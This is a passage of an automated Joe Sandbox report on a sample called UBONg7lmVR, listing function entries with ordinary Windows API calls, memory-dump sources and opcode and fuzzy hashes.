                                                  • Instruction ID: f78b58329d91abe5a8b5e008eb5f8270d8628d24ec6c76baee8819aeef8fd7ff
                                                  • Opcode Fuzzy Hash: 5bf53329119d7c5b14e408ebb3b8ffdb292ea397c1da17002d3ac61e82533738
                                                  • Instruction Fuzzy Hash: CC517831D143598FCB05EFA4C890BEDBFB6BF85300F24A56AD816AB350DB75A845CB50
                                                  APIs
                                                  • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 099B2CC2
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4513616921.00000000099B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 099B0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_99b0000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID: CreateWindow
                                                  • String ID:
                                                  • API String ID: 716092398-0
                                                  • Opcode ID: ba2374327c107d404e76eb23c235f22af250ec35a02d9e7b094da13c58296abf
                                                  • Instruction ID: b0154c31b102ae194858d16b25783d39854b3ca7fbd9f16eb2ca87de21c7e08c
                                                  • Opcode Fuzzy Hash: ba2374327c107d404e76eb23c235f22af250ec35a02d9e7b094da13c58296abf
                                                  • Instruction Fuzzy Hash: CE41CEB1D103099FDB14CF99C984ADEBBF5FF88310F24852AE819AB210D7759845CF90
                                                  APIs
                                                  • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 099B2CC2
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4513616921.00000000099B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 099B0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_99b0000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID: CreateWindow
                                                  • String ID:
                                                  • API String ID: 716092398-0
                                                  • Opcode ID: 1f8f3d6d937e3dd0b8f489175abdc722f15868681209b328375b12db375a1f80
                                                  • Instruction ID: 5117f54d7451da5af51ee0cea20ddcc03ce7885f12f2d7a40e77da7b0f985f44
                                                  • Opcode Fuzzy Hash: 1f8f3d6d937e3dd0b8f489175abdc722f15868681209b328375b12db375a1f80
                                                  • Instruction Fuzzy Hash: 3541CEB1D103099FDB14CF99C984ADEBBF5FF88310F24852AE819AB210D7759845CF90
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4517475359.0000000015410000.00000040.00000800.00020000.00000000.sdmp, Offset: 15410000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_15410000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID: Focus
                                                  • String ID:
                                                  • API String ID: 2734777837-0
                                                  • Opcode ID: 3d72f1b5076de0ab00ad2c54e0ae873eb9613bc33b255dc31323b162c5658e93
                                                  • Instruction ID: c186b02bf2d53c7196852aa3867699ce0b11f332221cf757d8fcf797f3393599
                                                  • Opcode Fuzzy Hash: 3d72f1b5076de0ab00ad2c54e0ae873eb9613bc33b255dc31323b162c5658e93
                                                  • Instruction Fuzzy Hash: BD315775A142658FCB04DF69C884AAEBBB5FF48A24F1144A9DD06AB351CB30FC41CBE1
                                                  APIs
                                                  • CallWindowProcW.USER32(?,?,?,?,?), ref: 099B5231
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4513616921.00000000099B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 099B0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_99b0000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID: CallProcWindow
                                                  • String ID:
                                                  • API String ID: 2714655100-0
                                                  • Opcode ID: 99d9b3d6b86a34aec9027bca355befc44f9d62296fe69e16cc4dbc9bc94dcb57
                                                  • Instruction ID: e099a473b7b8da6b29c9680bd6926154ba995ce4610a30b076a8dfb632feeec2
                                                  • Opcode Fuzzy Hash: 99d9b3d6b86a34aec9027bca355befc44f9d62296fe69e16cc4dbc9bc94dcb57
                                                  • Instruction Fuzzy Hash: 514129B5900305DFDB14CF99C848AAEBBF5FB88314F25C499E519AB321D774A841CFA1
                                                  APIs
                                                  • CreateActCtxA.KERNEL32(?), ref: 03F87159
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4505255314.0000000003F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 03F80000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3f80000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID: Create
                                                  • String ID:
                                                  • API String ID: 2289755597-0
                                                  • Opcode ID: 2ca7f24da2193c07acee8e52d965fdd40c31d38001f46632837d35cdeafc9d94
                                                  • Instruction ID: 5cb94038088ad695a31a7df36134a043d22ac23f368a7c1282ac0353b3bf2290
                                                  • Opcode Fuzzy Hash: 2ca7f24da2193c07acee8e52d965fdd40c31d38001f46632837d35cdeafc9d94
                                                  • Instruction Fuzzy Hash: 0441F271D00719CFDB24EFA9C884B9EBBF5BF49304F60806AD408AB255DB75694ACF90
                                                  APIs
                                                  • CreateActCtxA.KERNEL32(?), ref: 03F87159
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4505255314.0000000003F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 03F80000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3f80000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID: Create
                                                  • String ID:
                                                  • API String ID: 2289755597-0
                                                  • Opcode ID: c43abd6ec31e2fe785e97864acfe75551aa61b4549b46374b110687ff460e7da
                                                  • Instruction ID: a4314d720db66bae4d09b9c6616a02725f6cc6156429a8e3069fcf780d2281c7
                                                  • Opcode Fuzzy Hash: c43abd6ec31e2fe785e97864acfe75551aa61b4549b46374b110687ff460e7da
                                                  • Instruction Fuzzy Hash: B34113B1D00719CFDB24EFA9C844BDEBBB5BF49304F20806AD418AB255DB74694ACF50
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4517475359.0000000015410000.00000040.00000800.00020000.00000000.sdmp, Offset: 15410000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_15410000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID: Focus
                                                  • String ID:
                                                  • API String ID: 2734777837-0
                                                  • Opcode ID: 0da7faa288b10cb84651280490bf730f6fcbbec6c1430c301fa092d00a15c2af
                                                  • Instruction ID: d99bc58afac0b48df252c4106bc9e076bc52e9703353be84f7d739d0ecfdc1cd
                                                  • Opcode Fuzzy Hash: 0da7faa288b10cb84651280490bf730f6fcbbec6c1430c301fa092d00a15c2af
                                                  • Instruction Fuzzy Hash: 87215CB5A042598FCB00CFA5D8847AEBBB5FB08720F1545A9D906AB341C735A941CFE1
                                                  APIs
                                                  • MonitorFromPoint.USER32(?,?,00000002), ref: 07D29777
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4512242853.0000000007D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D20000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7d20000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID: FromMonitorPoint
                                                  • String ID:
                                                  • API String ID: 1566494148-0
                                                  • Opcode ID: 53e8b7ed4b12426ea604028adb0c92af8b5c7e02a2ce401194aba049e62b840d
                                                  • Instruction ID: 4be0c31ee08a76100723a9ee21521f8970648dccfa03456c01ec05791be9a557
                                                  • Opcode Fuzzy Hash: 53e8b7ed4b12426ea604028adb0c92af8b5c7e02a2ce401194aba049e62b840d
                                                  • Instruction Fuzzy Hash: 7B21AEB89003589FDB10DF69C814BAEFFB5EF49314F10844AD455AB384C774A906CFA1
                                                  APIs
                                                  • DrawTextExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,07D20AF5,?,?), ref: 07D20BA7
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4512242853.0000000007D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D20000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7d20000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID: DrawText
                                                  • String ID:
                                                  • API String ID: 2175133113-0
                                                  • Opcode ID: 0437019f7286c91efb492f7c8059d9cb8e7957797a658d85abd7ef7a44077d9f
                                                  • Instruction ID: 3597883f97cde5e5c6b6b33d6b7215760555c03f78d9b8d04f8da2bdb418e1dc
                                                  • Opcode Fuzzy Hash: 0437019f7286c91efb492f7c8059d9cb8e7957797a658d85abd7ef7a44077d9f
                                                  • Instruction Fuzzy Hash: E631E2B59003599FDB10CF9AD884AAEFBF4EB58314F14842AE919A7310D774A945CFA0
                                                  APIs
                                                  • DrawTextExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,07D20AF5,?,?), ref: 07D20BA7
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4512242853.0000000007D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D20000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7d20000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID: DrawText
                                                  • String ID:
                                                  • API String ID: 2175133113-0
                                                  • Opcode ID: 87a789e34c597e55351bc6af04b652753dd7455e5a2b7b05da96f44a2906a626
                                                  • Instruction ID: ef6f7c98628de1768c95d9fb32f8964c140a22fa5833903b01f16b9d930f7329
                                                  • Opcode Fuzzy Hash: 87a789e34c597e55351bc6af04b652753dd7455e5a2b7b05da96f44a2906a626
                                                  • Instruction Fuzzy Hash: B331E2B59002599FDB10CF9AD880ADEFBF5AF58314F14842AE819A7310D374A945CFA0
                                                  APIs
                                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 03F8E54F
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4505255314.0000000003F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 03F80000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3f80000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID: DuplicateHandle
                                                  • String ID:
                                                  • API String ID: 3793708945-0
                                                  • Opcode ID: 5ad5c23900a0dd98e6454119bd54f4f8b71d108cf9ed378be6f2d056a5746d58
                                                  • Instruction ID: c218f1e194ccc49369c7a0b2df30848cb8b04a07acb69fce1986dc4821b44307
                                                  • Opcode Fuzzy Hash: 5ad5c23900a0dd98e6454119bd54f4f8b71d108cf9ed378be6f2d056a5746d58
                                                  • Instruction Fuzzy Hash: 6121E2B59012489FDB10CFAAD984ADEFFF8EB48310F14841AE918A7350D378A944CFA0
                                                  APIs
                                                  • SetWindowTextW.USER32(?,00000000), ref: 07D2C43A
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4512242853.0000000007D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D20000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7d20000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID: TextWindow
                                                  • String ID:
                                                  • API String ID: 530164218-0
                                                  • Opcode ID: 285eb7a25bc48e2963e50ea247740e128eae164d1e0a2416bc4d06742c70863c
                                                  • Instruction ID: f8aad9b80d8103cdd156ae552e39188c350ae30660df1af7c4b69992d73c002b
                                                  • Opcode Fuzzy Hash: 285eb7a25bc48e2963e50ea247740e128eae164d1e0a2416bc4d06742c70863c
                                                  • Instruction Fuzzy Hash: 9D216AB18006198FDB10CF9AC444BEEFBF5EF88310F10842AD458A3700C334A546CFA1
                                                  APIs
                                                  • LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,03F8C2D9,00000800,00000000,00000000), ref: 03F8C4CA
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4505255314.0000000003F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 03F80000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3f80000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID: LibraryLoad
                                                  • String ID:
                                                  • API String ID: 1029625771-0
                                                  • Opcode ID: 7af971abff5023666ac18438d689bb06d4a747efa89db718d6656e0d49be5771
                                                  • Instruction ID: 1643ce3ccf0545cf215c8202f96676562d54c0a3c67f226c294698fcebe48adf
                                                  • Opcode Fuzzy Hash: 7af971abff5023666ac18438d689bb06d4a747efa89db718d6656e0d49be5771
                                                  • Instruction Fuzzy Hash: 511114B6D002099FDB24DF9AD444AEEFBF4EB88310F14846ED919A7200C375A945CFA4
                                                  APIs
                                                  • OleInitialize.OLE32(00000000), ref: 1541266D
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4517475359.0000000015410000.00000040.00000800.00020000.00000000.sdmp, Offset: 15410000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_15410000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID: Initialize
                                                  • String ID:
                                                  • API String ID: 2538663250-0
                                                  • Opcode ID: dcd656fa0e37206740cb6b2eaad5e0122dc8c591ef7171e4ac115e8a8b705cd3
                                                  • Instruction ID: ba99ab75772a1708ea37316b9f6de30008e078374bb30c04c3b2f2c8a97f08ae
                                                  • Opcode Fuzzy Hash: dcd656fa0e37206740cb6b2eaad5e0122dc8c591ef7171e4ac115e8a8b705cd3
                                                  • Instruction Fuzzy Hash: BB1126B1D043498FDB20CF9AD5857DABBF4EB48324F20445AD91AA7750C3B9A944CBA4
                                                  APIs
                                                  • PeekMessageW.USER32(?,?,00000000,00000000,00000000,?,?,?,?,154185AA,00000000,00000000,06CC4108,05D4E5AC), ref: 154189F8
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4517475359.0000000015410000.00000040.00000800.00020000.00000000.sdmp, Offset: 15410000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_15410000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID: MessagePeek
                                                  • String ID:
                                                  • API String ID: 2222842502-0
                                                  • Opcode ID: bb2fbf9bdd5dc7433b59118a68f378822f1d6f86e14f6c1a420d0fe9aae125e4
                                                  • Instruction ID: e72529d0689b9d8ec8ab3df293e036b9385307ad12b5469067347ff6058add07
                                                  • Opcode Fuzzy Hash: bb2fbf9bdd5dc7433b59118a68f378822f1d6f86e14f6c1a420d0fe9aae125e4
                                                  • Instruction Fuzzy Hash: 731129B5C04249DFDB10CF9AD484BDEBBF8FB48310F10846AE919A7241C378A945CFA5
                                                  APIs
                                                  • PeekMessageW.USER32(?,?,00000000,00000000,00000000,?,?,?,?,154185AA,00000000,00000000,06CC4108,05D4E5AC), ref: 154189F8
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4517475359.0000000015410000.00000040.00000800.00020000.00000000.sdmp, Offset: 15410000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_15410000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID: MessagePeek
                                                  • String ID:
                                                  • API String ID: 2222842502-0
                                                  • Opcode ID: 102e87f7161559e20419501409f24b2bd662a55cd1ed9784906a5bef65d791e2
                                                  • Instruction ID: da4ce7b51c234dc6f19eb91c8c7da4aca798faa2dedac3d01caba87fdddad0a3
                                                  • Opcode Fuzzy Hash: 102e87f7161559e20419501409f24b2bd662a55cd1ed9784906a5bef65d791e2
                                                  • Instruction Fuzzy Hash: F51129B5C00249DFDB10CF99D440BDEBBF4FB48310F10842AE959A7650C378A945CFA1
                                                  APIs
                                                  • LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,03F8C2D9,00000800,00000000,00000000), ref: 03F8C4CA
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4505255314.0000000003F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 03F80000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3f80000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID: LibraryLoad
                                                  • String ID:
                                                  • API String ID: 1029625771-0
                                                  • Opcode ID: 51c4ac321d202ae3e5134d80db5cb85e94fc87285a66796ddff5c73786ab6a6a
                                                  • Instruction ID: 0a657e31a74e03055a4be2a9082a6b9a22a8b161a29bca35e97c89aa8f3fc93e
                                                  • Opcode Fuzzy Hash: 51c4ac321d202ae3e5134d80db5cb85e94fc87285a66796ddff5c73786ab6a6a
                                                  • Instruction Fuzzy Hash: 041114B6D002099FDB24CF9AD444ADEFBF4EF88310F14842AD519A7200C379A545CFA4
                                                  APIs
                                                  • KiUserCallbackDispatcher.NTDLL(?,?,00000000,00000000,?,?,?,15418637,00000000,06CC4108,05D4E5AC,00000000,?), ref: 15418CC5
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4517475359.0000000015410000.00000040.00000800.00020000.00000000.sdmp, Offset: 15410000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_15410000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID: CallbackDispatcherUser
                                                  • String ID:
                                                  • API String ID: 2492992576-0
                                                  • Opcode ID: 2f94cb491d94c4336909fd3b315ca83484231fd141f83443fb57f786e98de322
                                                  • Instruction ID: 368c59b55e16b8825665b653734f0ab8f6859f4270f3f4063a179b4d6b0e55d5
                                                  • Opcode Fuzzy Hash: 2f94cb491d94c4336909fd3b315ca83484231fd141f83443fb57f786e98de322
                                                  • Instruction Fuzzy Hash: 8E1123B58042499FDB10CF9AD884BEEFBF8EB48310F10846AE915A7301D378A944CFA5
                                                  APIs
                                                  • PostMessageW.USER32(?,?,?,?), ref: 07D2F6E5
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4512242853.0000000007D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D20000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7d20000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID: MessagePost
                                                  • String ID:
                                                  • API String ID: 410705778-0
                                                  • Opcode ID: 0a448a98f6254f334f6dfe1c352287493ffa93ad6eba3288b1bfa201669f6dc0
                                                  • Instruction ID: ff31b4ade7fcbdca49f977550ce674a25b484c7b44abb19ffbc54be8ae141744
                                                  • Opcode Fuzzy Hash: 0a448a98f6254f334f6dfe1c352287493ffa93ad6eba3288b1bfa201669f6dc0
                                                  • Instruction Fuzzy Hash: 5A1149B58003599FDB10CF99C445BEEFBF8EB48324F208819D554A3600C375A945CFA5
                                                  APIs
                                                  • SetWindowTextW.USER32(?,00000000), ref: 07D2C43A
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4512242853.0000000007D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D20000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7d20000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID: TextWindow
                                                  • String ID:
                                                  • API String ID: 530164218-0
                                                  • Opcode ID: 3382d9517ff142591f85c362a4b0c0fed5dd4728a4c7fb161cdc773e6695484b
                                                  • Instruction ID: 2acfc8ecd40ef109b639bb4e388b93e17218bf5394781801bac2275651e7a4ba
                                                  • Opcode Fuzzy Hash: 3382d9517ff142591f85c362a4b0c0fed5dd4728a4c7fb161cdc773e6695484b
                                                  • Instruction Fuzzy Hash: 4C1114B68106198FDB10CF9AC444BEEFBF5EF88314F10842AD858A3240D378A946CFA5
                                                  APIs
                                                  • KiUserCallbackDispatcher.NTDLL(?,?,00000000,00000000,?,?,?,15418637,00000000,06CC4108,05D4E5AC,00000000,?), ref: 15418CC5
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4517475359.0000000015410000.00000040.00000800.00020000.00000000.sdmp, Offset: 15410000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_15410000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID: CallbackDispatcherUser
                                                  • String ID:
                                                  • API String ID: 2492992576-0
                                                  • Opcode ID: b83b62c7ed093aab578412fe746fb8ec432c17ec7078bdec11ed29382e5ab60b
                                                  • Instruction ID: 9eb9b8fe42c8b596563141c4e9dcbd05756846e82a8eac64090fb991a2041730
                                                  • Opcode Fuzzy Hash: b83b62c7ed093aab578412fe746fb8ec432c17ec7078bdec11ed29382e5ab60b
                                                  • Instruction Fuzzy Hash: 7C1126B5C042498FDB10CF9AD880BEEBBF8EB48310F10842AE855A3740C378A945CFA0
                                                  APIs
                                                  • KiUserCallbackDispatcher.NTDLL(00000000,?,?,?,-00000018,?,15418615,00000000,?), ref: 15418C10
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4517475359.0000000015410000.00000040.00000800.00020000.00000000.sdmp, Offset: 15410000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_15410000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID: CallbackDispatcherUser
                                                  • String ID:
                                                  • API String ID: 2492992576-0
                                                  • Opcode ID: ef00fa2e4e3c67b97f8b3bc0bec672976027624084488ae2bb929f356bb8bba5
                                                  • Instruction ID: 194a0db95fc0331b1e430e29499b0928ef10df3e3ef1d5f49aa9c887d2e4c24c
                                                  • Opcode Fuzzy Hash: ef00fa2e4e3c67b97f8b3bc0bec672976027624084488ae2bb929f356bb8bba5
                                                  • Instruction Fuzzy Hash: B81136B5800209CFDB10CF9AD485BDEFBF4EB48320F20845AD955A7340D338A945CFA5
                                                  APIs
                                                  • SetWindowLongW.USER32(?,?,?), ref: 099B2E55
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4513616921.00000000099B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 099B0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_99b0000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID: LongWindow
                                                  • String ID:
                                                  • API String ID: 1378638983-0
                                                  • Opcode ID: f93db8e2dc59f5513aeb8b30899e55090eea73637734ec981809fe6edbfd1dde
                                                  • Instruction ID: 3686140b1e4a79024352471f3491eb906e910c1caf79bd879865095b75c0b95e
                                                  • Opcode Fuzzy Hash: f93db8e2dc59f5513aeb8b30899e55090eea73637734ec981809fe6edbfd1dde
                                                  • Instruction Fuzzy Hash: A21113B58002498FDB20CF9AD585BDEBBF4EB58320F20845AD965A7340C379A945CFA1
                                                  APIs
                                                  • PostMessageW.USER32(?,?,?,?), ref: 07D2F6E5
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4512242853.0000000007D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D20000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7d20000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID: MessagePost
                                                  • String ID:
                                                  • API String ID: 410705778-0
                                                  • Opcode ID: d2e6ac0a29a611876ed5bffdf3af8fbe5aba27f18a9204b63759a78c841e2805
                                                  • Instruction ID: 2ad46a521dd597f61650d4423b1fb168248d6d15b54c5ab9eea7a1a12febd40f
                                                  • Opcode Fuzzy Hash: d2e6ac0a29a611876ed5bffdf3af8fbe5aba27f18a9204b63759a78c841e2805
                                                  • Instruction Fuzzy Hash: CA1136B58003599FDB10CF9AC845BEEFBF8EB48320F20881AE554A3250D378A945CFA5
                                                  APIs
                                                  • SendMessageW.USER32(?,?,?,?), ref: 07D2CC75
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4512242853.0000000007D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D20000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7d20000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID: MessageSend
                                                  • String ID:
                                                  • API String ID: 3850602802-0
                                                  • Opcode ID: 8d477ad66cbe9f43083cf92581a6383213e6be55cc499f1337a8a645a65ce1c6
                                                  • Instruction ID: 090ccd0bdcabbfb8070cc7aadddf9d3c9966e770fed13d4c6683d03a432d91ce
                                                  • Opcode Fuzzy Hash: 8d477ad66cbe9f43083cf92581a6383213e6be55cc499f1337a8a645a65ce1c6
                                                  • Instruction Fuzzy Hash: F91125B58003599FDB20CF9AC845BDEFBF8EB48314F20841AD518A7310C375A945CFA1
                                                  APIs
                                                  • SendMessageW.USER32(?,00000018,00000001,?), ref: 07D2FABD
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4512242853.0000000007D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D20000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7d20000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID: MessageSend
                                                  • String ID:
                                                  • API String ID: 3850602802-0
                                                  • Opcode ID: 896397aacc1e177b41ff408bf882968f6b68e13f3097b901385781a5fcfad9a5
                                                  • Instruction ID: fe733d1bad68f2879d7f5e19944d76562ebc012cd408f498edff5aa6b5782fec
                                                  • Opcode Fuzzy Hash: 896397aacc1e177b41ff408bf882968f6b68e13f3097b901385781a5fcfad9a5
                                                  • Instruction Fuzzy Hash: 671113B58003599FDB10CF99D885BDEFBF8EB48324F20881AE514A7701C375A944CFA1
                                                  APIs
                                                  • KiUserCallbackDispatcher.NTDLL(00000000,?,?,?,-00000018,?,15418615,00000000,?), ref: 15418C10
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4517475359.0000000015410000.00000040.00000800.00020000.00000000.sdmp, Offset: 15410000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_15410000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID: CallbackDispatcherUser
                                                  • String ID:
                                                  • API String ID: 2492992576-0
                                                  • Opcode ID: 9d1576cafae1dd83fb8d1cb79dd43e561f5c9864d423efe1caec2d55003b84f8
                                                  • Instruction ID: 42d6e77e2b6fd74c8cbe6e0c6057803490b76379ea4181b92b86c6f9777f6639
                                                  • Opcode Fuzzy Hash: 9d1576cafae1dd83fb8d1cb79dd43e561f5c9864d423efe1caec2d55003b84f8
                                                  • Instruction Fuzzy Hash: DE1136B5800209CFDB10DF9AC585BEEFBF4EB48320F10845AE955A7340D378A945CFA5
                                                  APIs
                                                  • SendMessageW.USER32(?,00000018,00000001,?), ref: 07D2FABD
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4512242853.0000000007D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D20000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7d20000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID: MessageSend
                                                  • String ID:
                                                  • API String ID: 3850602802-0
                                                  • Opcode ID: e4fc7701e931b8a242a10c7cd3ff87eae78b06994aff7bf88daf8ed164d40115
                                                  • Instruction ID: 1ba4cd3455cda5e40a939c297493cde1e62715950be13d434db48395bc01332f
                                                  • Opcode Fuzzy Hash: e4fc7701e931b8a242a10c7cd3ff87eae78b06994aff7bf88daf8ed164d40115
                                                  • Instruction Fuzzy Hash: 161136B58003599FDB10DF89C545BDEFBF8EB48314F108859E514A3300C375A945CFA0
                                                  APIs
                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 03F8C25E
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4505255314.0000000003F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 03F80000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3f80000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID: HandleModule
                                                  • String ID:
                                                  • API String ID: 4139908857-0
                                                  • Opcode ID: e8fa5cbd63718494e339b164d21413ce5e2bb058210b150e20df8ac61ba07ebb
                                                  • Instruction ID: 2348daac1da57b4fa8308259333dd44a409e53d4cf9a24e56bfe731b06c2a554
                                                  • Opcode Fuzzy Hash: e8fa5cbd63718494e339b164d21413ce5e2bb058210b150e20df8ac61ba07ebb
                                                  • Instruction Fuzzy Hash: 1C1122B5C002498FDB24DF9AD444ADEFBF4EF88320F14842AD829B7250C375A545CFA1
                                                  APIs
                                                  • OleInitialize.OLE32(00000000), ref: 1541266D
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4517475359.0000000015410000.00000040.00000800.00020000.00000000.sdmp, Offset: 15410000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_15410000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID: Initialize
                                                  • String ID:
                                                  • API String ID: 2538663250-0
                                                  • Opcode ID: d9a0d58bf9a3bc90be41d2bac98c38a277e3a337b311bb9c6454a76aa77d851c
                                                  • Instruction ID: b84415af18313219ad9a1980ef950392f25af54365ff9e933f9311d4f0914d1e
                                                  • Opcode Fuzzy Hash: d9a0d58bf9a3bc90be41d2bac98c38a277e3a337b311bb9c6454a76aa77d851c
                                                  • Instruction Fuzzy Hash: D51112B59043488FDB20DF9AD485B9EBBF8EB48320F20845AD919A7340D379A944CFA5
                                                  APIs
                                                  • DispatchMessageW.USER32(?,?,?,?,?,?,00000000,-00000018,?,154186EF), ref: 15419185
                                                  Memory Dump Source
